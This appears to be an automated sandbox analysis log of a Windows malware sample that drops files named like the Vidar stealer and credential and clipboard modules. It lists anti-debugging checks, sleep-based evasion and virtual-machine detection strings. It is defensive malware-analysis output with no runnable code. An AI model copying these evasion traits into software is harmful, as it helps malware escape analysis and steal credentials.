Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000101001\vidar.exe
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar[1].exe
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000102011\build.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\build[1].dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\C4v61Eu50U.exe API coverage: 3.1 %
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe API coverage: 8.9 %
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 5752 Thread sleep count: 94 > 30
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 5752 Thread sleep time: -2820000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 764 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 5752 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 30000
Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DAE
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0042F299 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042F299
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0043D592 mov eax, dword ptr fs:[00000030h] 0_2_0043D592
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0043982B mov eax, dword ptr fs:[00000030h] 0_2_0043982B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_02F1374B push dword ptr fs:[00000030h] 0_2_02F1374B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0491D7F9 mov eax, dword ptr fs:[00000030h] 0_2_0491D7F9
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048E0D90 mov eax, dword ptr fs:[00000030h] 0_2_048E0D90
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048E092B mov eax, dword ptr fs:[00000030h] 0_2_048E092B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04919A92 mov eax, dword ptr fs:[00000030h] 0_2_04919A92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0043D592 mov eax, dword ptr fs:[00000030h] 20_2_0043D592
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0043982B mov eax, dword ptr fs:[00000030h] 20_2_0043982B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_02E43033 push dword ptr fs:[00000030h] 20_2_02E43033
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0496D7F9 mov eax, dword ptr fs:[00000030h] 20_2_0496D7F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04930D90 mov eax, dword ptr fs:[00000030h] 20_2_04930D90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0493092B mov eax, dword ptr fs:[00000030h] 20_2_0493092B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04969A92 mov eax, dword ptr fs:[00000030h] 20_2_04969A92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0043D592 mov eax, dword ptr fs:[00000030h] 28_2_0043D592
